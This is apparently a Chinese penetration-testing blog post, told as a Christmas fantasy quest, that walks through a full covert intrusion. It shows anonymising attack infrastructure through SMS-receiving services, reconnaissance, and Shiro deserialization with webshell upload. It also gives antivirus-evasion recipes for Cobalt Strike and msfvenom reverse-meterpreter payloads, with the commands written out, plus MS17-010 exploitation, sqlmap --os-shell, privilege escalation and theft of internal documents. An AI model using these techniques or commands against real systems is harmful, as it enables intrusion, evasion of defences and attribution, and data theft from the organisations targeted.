拯救圣诞世界

  • A+

拯救圣诞世界

一、背景

“欢迎来到圣诞世界,它糟透了,但你会喜欢的。”
                   ——————圣诞智者

    2020年某年某月某日某个凌晨,随着一声“vktr”,你紧紧地握着手中的手机,心满意足的闭上了眼睛,你的意识逐渐模糊,紧接着,你的身体无力的压住了桌上的MAC。在之后的日子里,你从一个名不经传的小人物成了新闻的焦点,遗憾的是你却没有机会看到这一刻。
    圣诞世界,被遗弃的文明,此时正面临一场网络战争。能够拯救世界的方法只有唤醒巨人。可唤醒巨人的方法被敌人偷走了,现在你临危受命,需要帮助世界拿到拯救巨人的方法。接下来你会收到一份名单,这将是你的重点目标,根据线人情报,秘密会藏在某一个目标中。
    现在你可以针对他们进行攻击,但我们只能为你争取一周的时间。并且你需要注意不要被对方发现,我们将为你提供一个情报据点,两套装备以及10$的资金支持,当你获得那个秘密后,你可以随时把你的成果汇报到我们的据点。最后,你只有完成任务,你才可以回到你的世界。接下里,交给你了!
    智者奇思妙向会指引你前进。

二、藏身

接到目标的你需要几台匿名服务器来支持你发起进攻。你可以去网上看看,祝你好运。
--智者奇思妙向

    于是你拿着10$准备购买其他世界的服务器进行进攻,几经对比,你选择了vultr(https://www.vultr.com)作为你的服务商,首先它根据服务器配置不同按时收费,其次可以镜像还原,最后用完即可销毁。
   它满足你用时短,资金不足,可镜像,可立即销毁的需求。你感觉很满意。
   可是当你购买的时候,你发现你需要注册一个账号。而注册账号需要邮箱。注册邮箱需要手机号。手机号和你的身份ID绑定。这意味着当你面临某些意外时,你不再安全。
   可你是一个聪明人,你知道事情的源头出在了手机号的问题上。你当然会解决这个问题。
   于是你准备了一台干干净净的机子,挂上了不知道从哪里来的代理,找到了一个接码平台(https://www.yinsiduanxin.com)。
   你想利用接码平台来注册一个邮箱,于是你尝试了126、163等几个邮箱服务商,可你发现虚拟号码并不支持,你不想在这件事上花费太多的精力,于是你google了几家国外的邮件服务商准备利用接码平台中其他国家的手机号进行注册,一番操作后你发现很多手机号已经注册过邮箱了,当你测试第N个服务商后,发现依旧提示手机号已被注册,你决定换个思路,于是你选择了密码找回,并选择了zoho(https://mail.zoho.com)。
   只是因为眼前刚好是它。这次的事情出乎意料的顺利,你发现可以通过短信验证码登录,于是你利用接码平台顺利的登录了上去。
   现在,你拥有了一个匿名邮箱,虽然它存在公用的风险。紧接着你利用这个邮箱注册了vultr的账号,注册登录后你需要再往邮箱发送一封确认的邮件,之后你回到邮箱点击确认连接,最后,你在点击激活后把邮件从邮箱中彻底删除。
   至此,你拥有了一个完全匿名的vultr账号。唯一遗憾的是你需要充值的时候银行卡会产生一笔服务器消费的记录,可以感到稍微庆幸的是即使得知你有充值行为,你依旧拥有即时销毁服务器的能力以此来增加自己的安全系数。

注:事后发现outlook的邮箱注册不需要手机验证码。

三、武器

工欲善其事,必先利其器。
--智者奇思妙向

   拥有了服务器的你感到信心大增,你开通一台ubutu的服务器,并且将x-ray、awvs等配置完成并镜像了3台服务器,以应对接下来的打点战斗。

四、情报

知己知彼百战百胜。
--智者奇思妙向

紧接着你开始了对目标信息的搜集
内容包括
·目标域名
·目标域名真实IP
·目标域名真实IP全端口
·目标子域名
·目标子域名真实IP
·目标子域名真实IP的全端口

收集资产的途径:
1.利用子域名查询爆破工具(subdomainbrute、sublist3、ksubdomain)

```
subDomainsBrute:https://github.com/lijiejie/subDomainsBrute

sublist3:https://github.com/aboul3la/Sublist3r

ksubdomain:https://github.com/knownsec/ksubdomain
```

2.利用fofa、zooeye、shodan、谷歌、百度等搜索引擎

以域名后缀搜索,如*.com,加上地理位置等条件
以关键字搜索,给定目标中的某些关键字,或titile中包含XX国、XX省,可加上地理位置或不包含某些关键字来提高精确性

3.目标网站页面上的直属单位地址等
4.通过关键字搜索相关的微信小程序、公众号
5.通过关键字从应用商店搜索相关的APP
6.github关键字搜索目标相关信息
7.目标相关的第三方供应链

   以上资产收集整理汇总后,会得到多份URL清单,针对此清单,进行分批,第一批为目标域名及其子域名,第二批为利用关键字搜索得到的资产,第三批为微信小程序、公众号、APP等。
   针对以上获取的内容提取真实IP并判断是否有CDN,存在CDN的全部忽略,得到一批真实IP后对IP进行全端口扫描并获取其banner信息,针对相应服务,如ssh、mysql等服务及tomcat等存在后台的网站进行弱口令扫描。

五、进攻

断敌十指,不如伤其一臂。
--智者奇思妙向

   通过对上面工作的整理,你的运气很好,发现了N个存在弱口令、shiro反序列化和注入的网站。
对于命令执行类漏洞,比如shiro反序列化你是这样做的:
1.输入目标地址,点击下一步

1.jpg

2.选择检测方法

2.jpg
3.如果发现目标存在漏洞,可在此界面反弹shell或上传文件

3.jpg

如果上传指定shell,修改config文件下的shell.jsp文件

4.jpg
例如,你想上传一个冰蝎的马只需要把shell.jsp里的内容改为冰蝎马的内容

5.jpg
之后选择写入位置,即可。
之后利用此漏洞上传的一个冰蝎马,获取到了webshell权限。

6.jpg
你查看了当前用户的权限,为管理员权限

7.jpg
为了更方便的操作,你决定上传一个CS的木马,发现被直接查杀,然后你查看了一下进程,发现服务器上存在安全防护软件。然后你的脑海里回忆出你测试过的几种方法。
比如利用cs生成veil的payload,之后利用veil使用go编译来达到免杀的效果。

Veil by pass360

一、CS生成shellcode

8.jpg

9.jpg

0.jpg

11.jpg
二、安装veil
安装docker:

pull mattiasohlsson/veil

启动docker :

run -it -v /tmp/veil-output:/var/lib/veil/output:Z mattiasohlsson/veil

生成的所有文件在主机的/tmp/veil-output/目录下,
compiled目录下为exe文件
source目录下为go文件

22.jpg
三、veil免杀过360

33.jpg

44.jpg

55.jpg

66.jpg

77.jpg

88.jpg
测试360:

99.jpg
CS上线:

00.jpg

比如遇到火绒可通过msf生成php的马,之后通过php转exe软件进行msf的上线。

msf php to exe bypass av

1.生成php木马

msfvenom -p php/meterpreter_reverse_tcp LHOST=10.211.55.3 LPORT=3333 -f raw > payload.php

111.jpg
2.去掉开头的/*

222.jpg
3.利用bamcompile进行格式转换

bamcompile.exe -w -c payload.php payload.exe

333.jpg

若遇到其他杀毒可以试试掩日,也是一款不错的工具。

掩日免杀

https://github.com/1y0n/AV_Evasion_Tool

444.jpg

接着你通过上面的免杀上线了目标机器

555.jpg
你利用CS插件对内网ms17010进行探测

666.jpg
你发现了几台内网机器存在问题,你对存在ms17010漏洞的机器进行了利用,
你获取到了一台system权限的主机

777.jpg
你翻查主机发现了大量的情报,你感觉事情太顺利,紧接着你准备一鼓作气看看其它的网站。你利用同样的方法不断的获取敌方的情报,接下来你遇到了一点小问题,目标不出网,然后你可以选择冰蝎自带的代理一键开启,可以利用cs,也可以利用Neo-reGeorg,来进行正向连接,方法N+1。

888.jpg
一般可以直接用网站的代理,如果觉得不稳定,比如网站容易挂掉,可以上传个CS的马通过服务器回连。
本地可以安装proxychain来进行代理。针对内网资产探测也可以使用goby,perun等等.
对于存在注入的网站,你使用sqlmap命令

sqlmap -r 1.txt --risk=3 --level=5 --batch -v3

接着尝试通过注入获取数据库账号密码,并尝试破解明文,以期进入后台进一步扩大成果。你对dba权限的也尝试--os-shell参数,万一运气好呢?
你很幸运的拿到管理账号密码,即使不可以如果得到普通用户的账号密码也可以。
比如你拿到某个用户账号密码登入系统发现该OA系统集成了邮件功能,你发现了大量的敏感文件及内部人员联系方式,这为你进一步进攻有提供了良好的支持。
对于弱口令,若是ssh服务器简直天赐良机,你直接通过代理上去,再代理横扫内网。如果权限不够,你可是试试suid提权

https://gtfobins.github.io/

如果你不担心服务器出现问题,还可以尝试下脏牛提权。

经过艰苦卓绝的战斗,你已经掌握了大量的敌军情报,你将情报整理加密后传给了后方据点。根据据点情报的进一步反馈,最终你成功的获得了复活巨人的秘密。

六、总结

温故而知新。
--智者奇思妙向

   达成目的你功成身退,并在事后你得知同时尝试拯救世界的还有其他成员,你们被聚集在了一起,你们获得了很好的交流机会。比如有的成员通过供应链,有的成员提前已经打入敌军内部,有的成员通过诱惑敌方人员,总之花样百出,通过和其他成员的交流,你收获良多。

你对大致流程做了总结:

1.通过匿名隐藏自己
2.多渠道收集资产信息
3.批量探测漏洞
4.人工验证利用
5.内网进一步扩大战果
6.事后与其他成员交流思路
7.复盘总结,查缺补漏进一步提高自己

七、唤醒巨人的秘密

   最后,圣诞世界利用你得到的秘密成功复活了巨人,巨人拯救了圣诞世界,世界一片欢腾。

圣诞历,公元2233年,世界面临战争,传说只有唤醒巨人才可以拯救世界,而唤醒巨人的唯一方式就是:大古熬成汤。
--摘自《智者奇思妙向回忆录》